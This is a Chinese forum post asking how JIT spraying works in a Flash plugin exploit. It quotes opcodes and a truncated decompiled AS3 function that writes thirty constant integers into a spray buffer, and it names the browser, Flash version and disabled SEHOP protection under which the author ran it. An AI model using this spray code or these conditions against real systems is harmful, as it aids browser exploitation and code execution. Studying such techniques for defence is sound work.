比如一个swf文件,它的中间代码大概是这样:
_as3_pushint 156456771
_as3_callpropvoid writeInt(param count:1)
_as3_getlocal <0>
_as3_getproperty jit_egg
_as3_pushint 1359
_as3_callpropvoid writeInt(param count:1)
_as3_getlocal <0>
_as3_getproperty jit_egg
_as3_pushdouble 2462964344
_as3_callpropvoid writeInt(param count:1)
_as3_getlocal <0>
_as3_getproperty jit_egg
_as3_pushint 1163161579
反汇编源代码是这样:
// Decompiler output quoted by the post (AS3 from the SWF at the exploit-db link given below).
// The listing is truncated as posted: no closing brace or return statement is shown.
function pageLoadEx()
{
// Created but never referenced in the visible body; presumably decompiler residue or a line
// the post cut — confirm against the full SWF.
var _loc_1:* = new Loader();
// Byte order for every writeInt call that follows. jit_egg's type is not shown here; the
// endian property and writeInt calls suggest a ByteArray — verify in the full source.
this.jit_egg.endian = Endian.LITTLE_ENDIAN;
// Thirty constant 32-bit words appended to this.jit_egg, one per call, matching the opcode
// dump above (one push, then writeInt with param count 1). Literals above 2147483647 (e.g.
// 2462964344) exceed the AS3 int range; the dump shows them pushed as doubles
// (_as3_pushdouble) rather than ints — presumably coerced to int on the call, keeping the
// low 32 bits; confirm against the AVM2 coercion rules. The post's claim that these words
// later appear as executable bytes in memory is the author's; nothing in this listing
// shows JIT output.
// Defender note: a long run of constant writeInt calls into a ByteArray is a simple static
// signal worth flagging when scanning SWF content.
this.jit_egg.writeInt(156456771);
this.jit_egg.writeInt(1359);
this.jit_egg.writeInt(2462964344);
this.jit_egg.writeInt(1163161579);
this.jit_egg.writeInt(1986512408);
this.jit_egg.writeInt(3174682486);
this.jit_egg.writeInt(2720797961);
this.jit_egg.writeInt(3495836630);
this.jit_egg.writeInt(3212324519);
this.jit_egg.writeInt(1429101399);
this.jit_egg.writeInt(3932031664);
this.jit_egg.writeInt(635156349);
this.jit_egg.writeInt(3547179436);
this.jit_egg.writeInt(1407471022);
this.jit_egg.writeInt(1971932635);
this.jit_egg.writeInt(277404755);
this.jit_egg.writeInt(2327105845);
this.jit_egg.writeInt(1829846665);
this.jit_egg.writeInt(877160627);
this.jit_egg.writeInt(403690194);
this.jit_egg.writeInt(2292273698);
this.jit_egg.writeInt(3686507624);
this.jit_egg.writeInt(3205928413);
this.jit_egg.writeInt(117197396);
this.jit_egg.writeInt(81108174);
this.jit_egg.writeInt(2627472381);
this.jit_egg.writeInt(4013816252);
this.jit_egg.writeInt(1003287484);
this.jit_egg.writeInt(2488116851);
this.jit_egg.writeInt(3203958118);
// Listing ends here in the post; the remainder of the function is not shown.
但在内存中就变成了 0x3c909090 之类的,也就是《write jit spray for fun》那篇文章中提到的那种类似 xor 指令序列了
这些整数我都看过,转成16进制直接看,貌似跟0x3c909090没半点关系,但在内存中就变成了90 90 90 3c 35之类的攻击指令了
代码链接见:http://www.exploit-db.com/exploits/14599/
这是一个插件漏洞,漏洞没什么用,不值得去分析,找出来是想讨论下jit spray。那个swf文件是怎么喷射的,怎么就在内存中形成了90 90 90 3c 35之类的指令了??
我在windows7的ie9下测试,ok~~ 前提是把ie9的sehop保护先去掉(这跟这个漏洞的原理有关)~~ flash player必须是10.0.X的,这个你懂的。 执行完后,若成功,会转到www.exploit-db.com这个网站,里面的代码我没仔细分析过,所以有没有木马之类的,我无法保证……但毕竟是exploit-db的,应该没什么恶意~~
望大家多多指教~~